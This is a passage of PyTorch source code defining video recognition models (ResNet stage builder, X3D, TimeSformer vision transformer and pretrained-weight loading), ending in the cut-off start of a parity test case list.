init_helper.init_weights(self, cfg.MODEL.FC_INIT_STD, cfg.RESNET.ZERO_INIT_FINAL_BN)
def _construct_network(self, cfg):
"""
Builds a single pathway ResNet model.
Args:
cfg (CfgNode): model building configs, details are in the
comments of the config file.
"""
assert cfg.MODEL.ARCH in _POOL1.keys()
pool_size = _POOL1[cfg.MODEL.ARCH]
assert len({len(pool_size), self.num_pathways}) == 1
assert cfg.RESNET.DEPTH in _MODEL_STAGE_DEPTH.keys()
d2, d3, d4, d5 = _MODEL_STAGE_DEPTH[cfg.RESNET.DEPTH]
num_groups = cfg.RESNET.NUM_GROUPS
width_per_group = cfg.RESNET.WIDTH_PER_GROUP
dim_inner = num_groups * width_per_group
temp_kernel = _TEMPORAL_KERNEL_BASIS[cfg.MODEL.ARCH]
self.s1 = stem_helper.VideoModelStem(dim_in=cfg.DATA.INPUT_CHANNEL_NUM, dim_out=[width_per_group], kernel=[temp_kernel[0][0] + [7, 7]], stride=[[1, 2, 2]], padding=[[temp_kernel[0][0][0] // 2, 3, 3]], norm_module=self.norm_module)
self.s2 = resnet_helper.ResStage(dim_in=[width_per_group], dim_out=[width_per_group * 4], dim_inner=[dim_inner], temp_kernel_sizes=temp_kernel[1], stride=cfg.RESNET.SPATIAL_STRIDES[0], num_blocks=[d2], num_groups=[num_groups], num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[0], nonlocal_inds=cfg.NONLOCAL.LOCATION[0], nonlocal_group=cfg.NONLOCAL.GROUP[0], nonlocal_pool=cfg.NONLOCAL.POOL[0], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, stride_1x1=cfg.RESNET.STRIDE_1X1, inplace_relu=cfg.RESNET.INPLACE_RELU, dilation=cfg.RESNET.SPATIAL_DILATIONS[0], norm_module=self.norm_module)
for pathway in range(self.num_pathways):
pool = nn.MaxPool3d(kernel_size=pool_size[pathway], stride=pool_size[pathway], padding=[0, 0, 0])
self.add_module('pathway{}_pool'.format(pathway), pool)
self.s3 = resnet_helper.ResStage(dim_in=[width_per_group * 4], dim_out=[width_per_group * 8], dim_inner=[dim_inner * 2], temp_kernel_sizes=temp_kernel[2], stride=cfg.RESNET.SPATIAL_STRIDES[1], num_blocks=[d3], num_groups=[num_groups], num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[1], nonlocal_inds=cfg.NONLOCAL.LOCATION[1], nonlocal_group=cfg.NONLOCAL.GROUP[1], nonlocal_pool=cfg.NONLOCAL.POOL[1], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, stride_1x1=cfg.RESNET.STRIDE_1X1, inplace_relu=cfg.RESNET.INPLACE_RELU, dilation=cfg.RESNET.SPATIAL_DILATIONS[1], norm_module=self.norm_module)
self.s4 = resnet_helper.ResStage(dim_in=[width_per_group * 8], dim_out=[width_per_group * 16], dim_inner=[dim_inner * 4], temp_kernel_sizes=temp_kernel[3], stride=cfg.RESNET.SPATIAL_STRIDES[2], num_blocks=[d4], num_groups=[num_groups], num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[2], nonlocal_inds=cfg.NONLOCAL.LOCATION[2], nonlocal_group=cfg.NONLOCAL.GROUP[2], nonlocal_pool=cfg.NONLOCAL.POOL[2], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, stride_1x1=cfg.RESNET.STRIDE_1X1, inplace_relu=cfg.RESNET.INPLACE_RELU, dilation=cfg.RESNET.SPATIAL_DILATIONS[2], norm_module=self.norm_module)
self.s5 = resnet_helper.ResStage(dim_in=[width_per_group * 16], dim_out=[width_per_group * 32], dim_inner=[dim_inner * 8], temp_kernel_sizes=temp_kernel[4], stride=cfg.RESNET.SPATIAL_STRIDES[3], num_blocks=[d5], num_groups=[num_groups], num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[3], nonlocal_inds=cfg.NONLOCAL.LOCATION[3], nonlocal_group=cfg.NONLOCAL.GROUP[3], nonlocal_pool=cfg.NONLOCAL.POOL[3], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, stride_1x1=cfg.RESNET.STRIDE_1X1, inplace_relu=cfg.RESNET.INPLACE_RELU, dilation=cfg.RESNET.SPATIAL_DILATIONS[3], norm_module=self.norm_module)
if self.enable_detection:
self.head = head_helper.ResNetRoIHead(dim_in=[width_per_group * 32], num_classes=cfg.MODEL.NUM_CLASSES, pool_size=[[cfg.DATA.NUM_FRAMES // pool_size[0][0], 1, 1]], resolution=[[cfg.DETECTION.ROI_XFORM_RESOLUTION] * 2], scale_factor=[cfg.DETECTION.SPATIAL_SCALE_FACTOR], dropout_rate=cfg.MODEL.DROPOUT_RATE, act_func=cfg.MODEL.HEAD_ACT, aligned=cfg.DETECTION.ALIGNED)
else:
head = head_helper.ResNetBasicHead(dim_in=[width_per_group * 32], num_classes=cfg.MODEL.NUM_CLASSES, pool_size=[None, None] if cfg.MULTIGRID.SHORT_CYCLE else [[cfg.DATA.NUM_FRAMES // pool_size[0][0], cfg.DATA.TRAIN_CROP_SIZE // 32 // pool_size[0][1], cfg.DATA.TRAIN_CROP_SIZE // 32 // pool_size[0][2]]], dropout_rate=cfg.MODEL.DROPOUT_RATE, act_func=cfg.MODEL.HEAD_ACT)
self.head_name = 'head{}'.format(cfg.TASK)
self.add_module(self.head_name, head)
def forward(self, x, bboxes=None):
x = self.s1(x)
x = self.s2(x)
for pathway in range(self.num_pathways):
pool = getattr(self, 'pathway{}_pool'.format(pathway))
x[pathway] = pool(x[pathway])
x = self.s3(x)
x = self.s4(x)
x = self.s5(x)
head = getattr(self, self.head_name)
if self.enable_detection:
x = head(x, bboxes)
else:
x = head(x)
return x
class X3D(nn.Module):
"""
X3D model builder. It builds a X3D network backbone, which is a ResNet.
Christoph Feichtenhofer.
"X3D: Expanding Architectures for Efficient Video Recognition."
https://arxiv.org/abs/2004.04730
"""
def __init__(self, cfg):
"""
The `__init__` method of any subclass should also contain these
arguments.
Args:
cfg (CfgNode): model building configs, details are in the
comments of the config file.
"""
super(X3D, self).__init__()
self.norm_module = get_norm(cfg)
self.enable_detection = cfg.DETECTION.ENABLE
self.num_pathways = 1
exp_stage = 2.0
self.dim_c1 = cfg.X3D.DIM_C1
self.dim_res2 = self._round_width(self.dim_c1, exp_stage, divisor=8) if cfg.X3D.SCALE_RES2 else self.dim_c1
self.dim_res3 = self._round_width(self.dim_res2, exp_stage, divisor=8)
self.dim_res4 = self._round_width(self.dim_res3, exp_stage, divisor=8)
self.dim_res5 = self._round_width(self.dim_res4, exp_stage, divisor=8)
self.block_basis = [[1, self.dim_res2, 2], [2, self.dim_res3, 2], [5, self.dim_res4, 2], [3, self.dim_res5, 2]]
self._construct_network(cfg)
init_helper.init_weights(self, cfg.MODEL.FC_INIT_STD, cfg.RESNET.ZERO_INIT_FINAL_BN)
def _round_width(self, width, multiplier, min_depth=8, divisor=8):
"""Round width of filters based on width multiplier."""
if not multiplier:
return width
width *= multiplier
min_depth = min_depth or divisor
new_filters = max(min_depth, int(width + divisor / 2) // divisor * divisor)
if new_filters < 0.9 * width:
new_filters += divisor
return int(new_filters)
def _round_repeats(self, repeats, multiplier):
"""Round number of layers based on depth multiplier."""
multiplier = multiplier
if not multiplier:
return repeats
return int(math.ceil(multiplier * repeats))
def _construct_network(self, cfg):
"""
Builds a single pathway X3D model.
Args:
cfg (CfgNode): model building configs, details are in the
comments of the config file.
"""
assert cfg.MODEL.ARCH in _POOL1.keys()
assert cfg.RESNET.DEPTH in _MODEL_STAGE_DEPTH.keys()
d2, d3, d4, d5 = _MODEL_STAGE_DEPTH[cfg.RESNET.DEPTH]
num_groups = cfg.RESNET.NUM_GROUPS
width_per_group = cfg.RESNET.WIDTH_PER_GROUP
dim_inner = num_groups * width_per_group
w_mul = cfg.X3D.WIDTH_FACTOR
d_mul = cfg.X3D.DEPTH_FACTOR
dim_res1 = self._round_width(self.dim_c1, w_mul)
temp_kernel = _TEMPORAL_KERNEL_BASIS[cfg.MODEL.ARCH]
self.s1 = stem_helper.VideoModelStem(dim_in=cfg.DATA.INPUT_CHANNEL_NUM, dim_out=[dim_res1], kernel=[temp_kernel[0][0] + [3, 3]], stride=[[1, 2, 2]], padding=[[temp_kernel[0][0][0] // 2, 1, 1]], norm_module=self.norm_module, stem_func_name='x3d_stem')
dim_in = dim_res1
for stage, block in enumerate(self.block_basis):
dim_out = self._round_width(block[1], w_mul)
dim_inner = int(cfg.X3D.BOTTLENECK_FACTOR * dim_out)
n_rep = self._round_repeats(block[0], d_mul)
prefix = 's{}'.format(stage + 2)
s = resnet_helper.ResStage(dim_in=[dim_in], dim_out=[dim_out], dim_inner=[dim_inner], temp_kernel_sizes=temp_kernel[1], stride=[block[2]], num_blocks=[n_rep], num_groups=[dim_inner] if cfg.X3D.CHANNELWISE_3x3x3 else [num_groups], num_block_temp_kernel=[n_rep], nonlocal_inds=cfg.NONLOCAL.LOCATION[0], nonlocal_group=cfg.NONLOCAL.GROUP[0], nonlocal_pool=cfg.NONLOCAL.POOL[0], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, stride_1x1=cfg.RESNET.STRIDE_1X1, norm_module=self.norm_module, dilation=cfg.RESNET.SPATIAL_DILATIONS[stage], drop_connect_rate=cfg.MODEL.DROPCONNECT_RATE * (stage + 2) / (len(self.block_basis) + 1))
dim_in = dim_out
self.add_module(prefix, s)
if self.enable_detection:
NotImplementedError
else:
spat_sz = int(math.ceil(cfg.DATA.TRAIN_CROP_SIZE / 32.0))
self.head = head_helper.X3DHead(dim_in=dim_out, dim_inner=dim_inner, dim_out=cfg.X3D.DIM_C5, num_classes=cfg.MODEL.NUM_CLASSES, pool_size=[cfg.DATA.NUM_FRAMES, spat_sz, spat_sz], dropout_rate=cfg.MODEL.DROPOUT_RATE, act_func=cfg.MODEL.HEAD_ACT, bn_lin5_on=cfg.X3D.BN_LIN5)
def forward(self, x, bboxes=None):
for module in self.children():
x = module(x)
return x
class Mlp(nn.Module):
def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.0):
super().__init__()
out_features = out_features or in_features
hidden_features = hidden_features or in_features
self.fc1 = nn.Linear(in_features, hidden_features)
self.act = act_layer()
self.fc2 = nn.Linear(hidden_features, out_features)
self.drop = nn.Dropout(drop)
def forward(self, x):
x = self.fc1(x)
x = self.act(x)
x = self.drop(x)
x = self.fc2(x)
x = self.drop(x)
return x
class Attention(nn.Module):
def __init__(self, dim, num_heads=8, qkv_bias=False, qk_scale=None, attn_drop=0.0, proj_drop=0.0, with_qkv=True):
super().__init__()
self.num_heads = num_heads
head_dim = dim // num_heads
self.scale = qk_scale or head_dim ** -0.5
self.with_qkv = with_qkv
if self.with_qkv:
self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)
self.proj = nn.Linear(dim, dim)
self.proj_drop = nn.Dropout(proj_drop)
self.attn_drop = nn.Dropout(attn_drop)
def forward(self, x):
B, N, C = x.shape
if self.with_qkv:
qkv = self.qkv(x).reshape(B, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)
q, k, v = qkv[0], qkv[1], qkv[2]
else:
qkv = x.reshape(B, N, self.num_heads, C // self.num_heads).permute(0, 2, 1, 3)
q, k, v = qkv, qkv, qkv
attn = q @ k.transpose(-2, -1) * self.scale
attn = attn.softmax(dim=-1)
attn = self.attn_drop(attn)
x = (attn @ v).transpose(1, 2).reshape(B, N, C)
if self.with_qkv:
x = self.proj(x)
x = self.proj_drop(x)
return x
def drop_path(x, drop_prob: float=0.0, training: bool=False):
"""Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).
This is the same as the DropConnect impl I created for EfficientNet, etc networks, however,
the original name is misleading as 'Drop Connect' is a different form of dropout in a separate paper...
See discussion: https://github.com/tensorflow/tpu/issues/494#issuecomment-532968956 ... I've opted for
changing the layer and argument names to 'drop path' rather than mix DropConnect as a layer name and use
'survival rate' as the argument.
"""
if drop_prob == 0.0 or not training:
return x
keep_prob = 1 - drop_prob
shape = (x.shape[0],) + (1,) * (x.ndim - 1)
random_tensor = keep_prob + torch.rand(shape, dtype=x.dtype, device=x.device)
random_tensor.floor_()
output = x.div(keep_prob) * random_tensor
return output
class DropPath(nn.Module):
"""Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).
"""
def __init__(self, drop_prob=None):
super(DropPath, self).__init__()
self.drop_prob = drop_prob
def forward(self, x):
return drop_path(x, self.drop_prob, self.training)
class Block(nn.Module):
def __init__(self, dim, num_heads, mlp_ratio=4.0, qkv_bias=False, qk_scale=None, drop=0.0, attn_drop=0.0, drop_path=0.1, act_layer=nn.GELU, norm_layer=nn.LayerNorm, attention_type='divided_space_time'):
super().__init__()
self.attention_type = attention_type
assert attention_type in ['divided_space_time', 'space_only', 'joint_space_time']
self.norm1 = norm_layer(dim)
self.attn = Attention(dim, num_heads=num_heads, qkv_bias=qkv_bias, qk_scale=qk_scale, attn_drop=attn_drop, proj_drop=drop)
if self.attention_type == 'divided_space_time':
self.temporal_norm1 = norm_layer(dim)
self.temporal_attn = Attention(dim, num_heads=num_heads, qkv_bias=qkv_bias, qk_scale=qk_scale, attn_drop=attn_drop, proj_drop=drop)
self.temporal_fc = nn.Linear(dim, dim)
self.drop_path = DropPath(drop_path) if drop_path > 0.0 else nn.Identity()
self.norm2 = norm_layer(dim)
mlp_hidden_dim = int(dim * mlp_ratio)
self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=drop)
def forward(self, x, B, T, W):
num_spatial_tokens = (x.size(1) - 1) // T
H = num_spatial_tokens // W
if self.attention_type in ['space_only', 'joint_space_time']:
x = x + self.drop_path(self.attn(self.norm1(x)))
x = x + self.drop_path(self.mlp(self.norm2(x)))
return x
elif self.attention_type == 'divided_space_time':
xt = x[:, 1:, :]
xt = rearrange(xt, 'b (h w t) m -> (b h w) t m', b=B, h=H, w=W, t=T)
res_temporal = self.drop_path(self.temporal_attn(self.temporal_norm1(xt)))
res_temporal = rearrange(res_temporal, '(b h w) t m -> b (h w t) m', b=B, h=H, w=W, t=T)
res_temporal = self.temporal_fc(res_temporal)
xt = x[:, 1:, :] + res_temporal
init_cls_token = x[:, 0, :].unsqueeze(1)
cls_token = init_cls_token.repeat(1, T, 1)
cls_token = rearrange(cls_token, 'b t m -> (b t) m', b=B, t=T).unsqueeze(1)
xs = xt
xs = rearrange(xs, 'b (h w t) m -> (b t) (h w) m', b=B, h=H, w=W, t=T)
xs = torch.cat((cls_token, xs), 1)
res_spatial = self.drop_path(self.attn(self.norm1(xs)))
cls_token = res_spatial[:, 0, :]
cls_token = rearrange(cls_token, '(b t) m -> b t m', b=B, t=T)
cls_token = torch.mean(cls_token, 1, True)
res_spatial = res_spatial[:, 1:, :]
res_spatial = rearrange(res_spatial, '(b t) (h w) m -> b (h w t) m', b=B, h=H, w=W, t=T)
res = res_spatial
x = xt
x = torch.cat((init_cls_token, x), 1) + torch.cat((cls_token, res), 1)
x = x + self.drop_path(self.mlp(self.norm2(x)))
return x
def _ntuple(n):
def parse(x):
if isinstance(x, container_abcs.Iterable):
return x
return tuple(repeat(x, n))
return parse
to_2tuple = _ntuple(2)
class PatchEmbed(nn.Module):
""" Image to Patch Embedding
"""
def __init__(self, img_size=224, patch_size=16, in_chans=3, embed_dim=768):
super().__init__()
img_size = to_2tuple(img_size)
patch_size = to_2tuple(patch_size)
num_patches = img_size[1] // patch_size[1] * (img_size[0] // patch_size[0])
self.img_size = img_size
self.patch_size = patch_size
self.num_patches = num_patches
self.proj = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=patch_size)
def forward(self, x):
B, C, T, H, W = x.shape
x = rearrange(x, 'b c t h w -> (b t) c h w')
x = self.proj(x)
W = x.size(-1)
x = x.flatten(2).transpose(1, 2)
return x, T, W
def _no_grad_trunc_normal_(tensor, mean, std, a, b):
def norm_cdf(x):
return (1.0 + math.erf(x / math.sqrt(2.0))) / 2.0
if mean < a - 2 * std or mean > b + 2 * std:
warnings.warn('mean is more than 2 std from [a, b] in nn.init.trunc_normal_. The distribution of values may be incorrect.', stacklevel=2)
with torch.no_grad():
l = norm_cdf((a - mean) / std)
u = norm_cdf((b - mean) / std)
tensor.uniform_(2 * l - 1, 2 * u - 1)
tensor.erfinv_()
tensor.mul_(std * math.sqrt(2.0))
tensor.add_(mean)
tensor.clamp_(min=a, max=b)
return tensor
def trunc_normal_(tensor, mean=0.0, std=1.0, a=-2.0, b=2.0):
"""Fills the input Tensor with values drawn from a truncated
normal distribution. The values are effectively drawn from the
normal distribution :math:`\\mathcal{N}(\\text{mean}, \\text{std}^2)`
with values outside :math:`[a, b]` redrawn until they are within
the bounds. The method used for generating the random values works
best when :math:`a \\leq \\text{mean} \\leq b`.
Args:
tensor: an n-dimensional `torch.Tensor`
mean: the mean of the normal distribution
std: the standard deviation of the normal distribution
a: the minimum cutoff value
b: the maximum cutoff value
Examples:
>>> w = torch.empty(3, 5)
>>> nn.init.trunc_normal_(w)
"""
return _no_grad_trunc_normal_(tensor, mean, std, a, b)
class VisionTransformer(nn.Module):
""" Vision Transformere
"""
def __init__(self, img_size=224, patch_size=16, in_chans=3, num_classes=1000, embed_dim=768, depth=12, num_heads=12, mlp_ratio=4.0, qkv_bias=False, qk_scale=None, drop_rate=0.0, attn_drop_rate=0.0, drop_path_rate=0.1, hybrid_backbone=None, norm_layer=nn.LayerNorm, num_frames=8, attention_type='divided_space_time', dropout=0.0):
super().__init__()
self.attention_type = attention_type
self.depth = depth
self.dropout = nn.Dropout(dropout)
self.num_classes = num_classes
self.num_features = self.embed_dim = embed_dim
self.patch_embed = PatchEmbed(img_size=img_size, patch_size=patch_size, in_chans=in_chans, embed_dim=embed_dim)
num_patches = self.patch_embed.num_patches
self.cls_token = nn.Parameter(torch.zeros(1, 1, embed_dim))
self.pos_embed = nn.Parameter(torch.zeros(1, num_patches + 1, embed_dim))
self.pos_drop = nn.Dropout(p=drop_rate)
if self.attention_type != 'space_only':
self.time_embed = nn.Parameter(torch.zeros(1, num_frames, embed_dim))
self.time_drop = nn.Dropout(p=drop_rate)
dpr = [x.item() for x in torch.linspace(0, drop_path_rate, self.depth)]
self.blocks = nn.ModuleList([Block(dim=embed_dim, num_heads=num_heads, mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, qk_scale=qk_scale, drop=drop_rate, attn_drop=attn_drop_rate, drop_path=dpr[i], norm_layer=norm_layer, attention_type=self.attention_type) for i in range(self.depth)])
self.norm = norm_layer(embed_dim)
self.head = nn.Linear(embed_dim, num_classes) if num_classes > 0 else nn.Identity()
trunc_normal_(self.pos_embed, std=0.02)
trunc_normal_(self.cls_token, std=0.02)
self.apply(self._init_weights)
if self.attention_type == 'divided_space_time':
i = 0
for m in self.blocks.modules():
m_str = str(m)
if 'Block' in m_str:
if i > 0:
nn.init.constant_(m.temporal_fc.weight, 0)
nn.init.constant_(m.temporal_fc.bias, 0)
i += 1
def _init_weights(self, m):
if isinstance(m, nn.Linear):
trunc_normal_(m.weight, std=0.02)
if isinstance(m, nn.Linear) and m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.LayerNorm):
nn.init.constant_(m.bias, 0)
nn.init.constant_(m.weight, 1.0)
@torch.jit.ignore
def no_weight_decay(self):
return {'pos_embed', 'cls_token', 'time_embed'}
def get_classifier(self):
return self.head
def reset_classifier(self, num_classes, global_pool=''):
self.num_classes = num_classes
self.head = nn.Linear(self.embed_dim, num_classes) if num_classes > 0 else nn.Identity()
def forward_features(self, x):
B = x.shape[0]
x, T, W = self.patch_embed(x)
cls_tokens = self.cls_token.expand(x.size(0), -1, -1)
x = torch.cat((cls_tokens, x), dim=1)
if x.size(1) != self.pos_embed.size(1):
pos_embed = self.pos_embed
cls_pos_embed = pos_embed[0, 0, :].unsqueeze(0).unsqueeze(1)
other_pos_embed = pos_embed[0, 1:, :].unsqueeze(0).transpose(1, 2)
P = int(other_pos_embed.size(2) ** 0.5)
H = x.size(1) // W
other_pos_embed = other_pos_embed.reshape(1, x.size(2), P, P)
new_pos_embed = F.interpolate(other_pos_embed, size=(H, W), mode='nearest')
new_pos_embed = new_pos_embed.flatten(2)
new_pos_embed = new_pos_embed.transpose(1, 2)
new_pos_embed = torch.cat((cls_pos_embed, new_pos_embed), 1)
x = x + new_pos_embed
else:
x = x + self.pos_embed
x = self.pos_drop(x)
if self.attention_type != 'space_only':
cls_tokens = x[:B, 0, :].unsqueeze(1)
x = x[:, 1:]
x = rearrange(x, '(b t) n m -> (b n) t m', b=B, t=T)
if T != self.time_embed.size(1):
time_embed = self.time_embed.transpose(1, 2)
new_time_embed = F.interpolate(time_embed, size=T, mode='nearest')
new_time_embed = new_time_embed.transpose(1, 2)
x = x + new_time_embed
else:
x = x + self.time_embed
x = self.time_drop(x)
x = rearrange(x, '(b n) t m -> b (n t) m', b=B, t=T)
x = torch.cat((cls_tokens, x), dim=1)
for blk in self.blocks:
x = blk(x, B, T, W)
if self.attention_type == 'space_only':
x = rearrange(x, '(b t) n m -> b t n m', b=B, t=T)
x = torch.mean(x, 1)
x = self.norm(x)
return x[:, 0]
def forward(self, x):
x = self.forward_features(x)
x = self.head(x)
return x
def _conv_filter(state_dict, patch_size=16):
""" convert patch embedding weight from manual patchify + linear proj to conv"""
out_dict = {}
for k, v in state_dict.items():
if 'patch_embed.proj.weight' in k:
if v.shape[-1] != patch_size:
patch_size = v.shape[-1]
v = v.reshape((v.shape[0], 3, patch_size, patch_size))
out_dict[k] = v
return out_dict
IMAGENET_DEFAULT_MEAN = 0.485, 0.456, 0.406
IMAGENET_DEFAULT_STD = 0.229, 0.224, 0.225
def _cfg(url='', **kwargs):
return {'url': url, 'num_classes': 1000, 'input_size': (3, 224, 224), 'pool_size': None, 'crop_pct': 0.9, 'interpolation': 'bicubic', 'mean': IMAGENET_DEFAULT_MEAN, 'std': IMAGENET_DEFAULT_STD, 'first_conv': 'patch_embed.proj', 'classifier': 'head', **kwargs}
default_cfgs = {'vit_base_patch16_224': _cfg(url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-vitjx/jx_vit_base_p16_224-80ecf9dd.pth', mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))}
_logger = logging.getLogger(__name__)
def load_state_dict(checkpoint_path, use_ema=False):
if checkpoint_path and os.path.isfile(checkpoint_path):
checkpoint = torch.load(checkpoint_path, map_location='cpu')
state_dict_key = 'state_dict'
if isinstance(checkpoint, dict):
if use_ema and 'state_dict_ema' in checkpoint:
state_dict_key = 'state_dict_ema'
if state_dict_key and state_dict_key in checkpoint:
new_state_dict = OrderedDict()
for k, v in checkpoint[state_dict_key].items():
name = k[7:] if k.startswith('module') else k
new_state_dict[name] = v
state_dict = new_state_dict
elif 'model_state' in checkpoint:
state_dict_key = 'model_state'
new_state_dict = OrderedDict()
for k, v in checkpoint[state_dict_key].items():
name = k[6:] if k.startswith('model') else k
new_state_dict[name] = v
state_dict = new_state_dict
else:
state_dict = checkpoint
_logger.info("Loaded {} from checkpoint '{}'".format(state_dict_key, checkpoint_path))
return state_dict
else:
_logger.error("No checkpoint found at '{}'".format(checkpoint_path))
raise FileNotFoundError()
def load_pretrained(model, cfg=None, num_classes=1000, in_chans=3, filter_fn=None, img_size=224, num_frames=8, num_patches=196, attention_type='divided_space_time', pretrained_model='', strict=True):
if cfg is None:
cfg = getattr(model, 'default_cfg')
if cfg is None or 'url' not in cfg or not cfg['url']:
_logger.warning('Pretrained model URL is invalid, using random initialization.')
return
if len(pretrained_model) == 0:
state_dict = model_zoo.load_url(cfg['url'], progress=False, map_location='cpu')
else:
try:
state_dict = load_state_dict(pretrained_model)['model']
except:
state_dict = load_state_dict(pretrained_model)
if filter_fn is not None:
state_dict = filter_fn(state_dict)
if in_chans == 1:
conv1_name = cfg['first_conv']
_logger.info('Converting first conv (%s) pretrained weights from 3 to 1 channel' % conv1_name)
conv1_weight = state_dict[conv1_name + '.weight']
conv1_type = conv1_weight.dtype
conv1_weight = conv1_weight.float()
O, I, J, K = conv1_weight.shape
if I > 3:
assert conv1_weight.shape[1] % 3 == 0
conv1_weight = conv1_weight.reshape(O, I // 3, 3, J, K)
conv1_weight = conv1_weight.sum(dim=2, keepdim=False)
else:
conv1_weight = conv1_weight.sum(dim=1, keepdim=True)
conv1_weight = conv1_weight
state_dict[conv1_name + '.weight'] = conv1_weight
elif in_chans != 3:
conv1_name = cfg['first_conv']
conv1_weight = state_dict[conv1_name + '.weight']
conv1_type = conv1_weight.dtype
conv1_weight = conv1_weight.float()
O, I, J, K = conv1_weight.shape
if I != 3:
_logger.warning('Deleting first conv (%s) from pretrained weights.' % conv1_name)
del state_dict[conv1_name + '.weight']
strict = False
else:
_logger.info('Repeating first conv (%s) weights in channel dim.' % conv1_name)
repeat = int(math.ceil(in_chans / 3))
conv1_weight = conv1_weight.repeat(1, repeat, 1, 1)[:, :in_chans, :, :]
conv1_weight *= 3 / float(in_chans)
conv1_weight = conv1_weight
state_dict[conv1_name + '.weight'] = conv1_weight
classifier_name = cfg['classifier']
if num_classes == 1000 and cfg['num_classes'] == 1001:
classifier_weight = state_dict[classifier_name + '.weight']
state_dict[classifier_name + '.weight'] = classifier_weight[1:]
classifier_bias = state_dict[classifier_name + '.bias']
state_dict[classifier_name + '.bias'] = classifier_bias[1:]
elif num_classes != state_dict[classifier_name + '.weight'].size(0):
del state_dict[classifier_name + '.weight']
del state_dict[classifier_name + '.bias']
strict = False
if num_patches + 1 != state_dict['pos_embed'].size(1):
pos_embed = state_dict['pos_embed']
cls_pos_embed = pos_embed[0, 0, :].unsqueeze(0).unsqueeze(1)
other_pos_embed = pos_embed[0, 1:, :].unsqueeze(0).transpose(1, 2)
new_pos_embed = F.interpolate(other_pos_embed, size=num_patches, mode='nearest')
new_pos_embed = new_pos_embed.transpose(1, 2)
new_pos_embed = torch.cat((cls_pos_embed, new_pos_embed), 1)
state_dict['pos_embed'] = new_pos_embed
if 'time_embed' in state_dict and num_frames != state_dict['time_embed'].size(1):
time_embed = state_dict['time_embed'].transpose(1, 2)
new_time_embed = F.interpolate(time_embed, size=num_frames, mode='nearest')
state_dict['time_embed'] = new_time_embed.transpose(1, 2)
if attention_type == 'divided_space_time':
new_state_dict = state_dict.copy()
for key in state_dict:
if 'blocks' in key and 'attn' in key:
new_key = key.replace('attn', 'temporal_attn')
if not new_key in state_dict:
new_state_dict[new_key] = state_dict[key]
else:
new_state_dict[new_key] = state_dict[new_key]
if 'blocks' in key and 'norm1' in key:
new_key = key.replace('norm1', 'temporal_norm1')
if not new_key in state_dict:
new_state_dict[new_key] = state_dict[key]
else:
new_state_dict[new_key] = state_dict[new_key]
state_dict = new_state_dict
model.load_state_dict(state_dict, strict=False)
class vit_base_patch16_224(nn.Module):
def __init__(self, cfg, **kwargs):
super(vit_base_patch16_224, self).__init__()
self.pretrained = True
patch_size = 16
self.model = VisionTransformer(img_size=cfg.DATA.TRAIN_CROP_SIZE, num_classes=cfg.MODEL.NUM_CLASSES, patch_size=patch_size, embed_dim=768, depth=12, num_heads=12, mlp_ratio=4, qkv_bias=True, norm_layer=partial(nn.LayerNorm, eps=1e-06), drop_rate=0.0, attn_drop_rate=0.0, drop_path_rate=0.1, num_frames=cfg.DATA.NUM_FRAMES, attention_type=cfg.TIMESFORMER.ATTENTION_TYPE, **kwargs)
self.attention_type = cfg.TIMESFORMER.ATTENTION_TYPE
self.model.default_cfg = default_cfgs['vit_base_patch16_224']
self.num_patches = cfg.DATA.TRAIN_CROP_SIZE // patch_size * (cfg.DATA.TRAIN_CROP_SIZE // patch_size)
pretrained_model = cfg.TIMESFORMER.PRETRAINED_MODEL
if self.pretrained:
load_pretrained(self.model, num_classes=self.model.num_classes, in_chans=kwargs.get('in_chans', 3), filter_fn=_conv_filter, img_size=cfg.DATA.TRAIN_CROP_SIZE, num_patches=self.num_patches, attention_type=self.attention_type, pretrained_model=pretrained_model)
def forward(self, x):
x = self.model(x)
return x
class TimeSformer(nn.Module):
def __init__(self, img_size=224, patch_size=16, num_classes=400, num_frames=8, attention_type='divided_space_time', pretrained_model='', **kwargs):
super(TimeSformer, self).__init__()
self.pretrained = True
self.model = VisionTransformer(img_size=img_size, num_classes=num_classes, patch_size=patch_size, embed_dim=768, depth=12, num_heads=12, mlp_ratio=4, qkv_bias=True, norm_layer=partial(nn.LayerNorm, eps=1e-06), drop_rate=0.0, attn_drop_rate=0.0, drop_path_rate=0.1, num_frames=num_frames, attention_type=attention_type, **kwargs)
self.attention_type = attention_type
self.model.default_cfg = default_cfgs['vit_base_patch' + str(patch_size) + '_224']
self.num_patches = img_size // patch_size * (img_size // patch_size)
if self.pretrained:
load_pretrained(self.model, num_classes=self.model.num_classes, in_chans=kwargs.get('in_chans', 3), filter_fn=_conv_filter, img_size=img_size, num_frames=num_frames, num_patches=self.num_patches, attention_type=self.attention_type, pretrained_model=pretrained_model)
def forward(self, x):
x = self.model(x)
return x
import torch
from torch.nn import MSELoss, ReLU
from _paritybench_helpers import _mock_config, _mock_layer, _paritybench_base, _fails_compile
TESTCASES = [
# (nn.Module, init_args, forward_args, jit_compiles)
(BasicTransform,
lambda: ([], {'dim_in': 4, 'dim_out': 4, 'temp_kernel_size': 4, 'stride': 1}),
lambda: ([torch.rand([4, 4, 4, 4, 4])], {}),
True),
(BottleneckTransform,
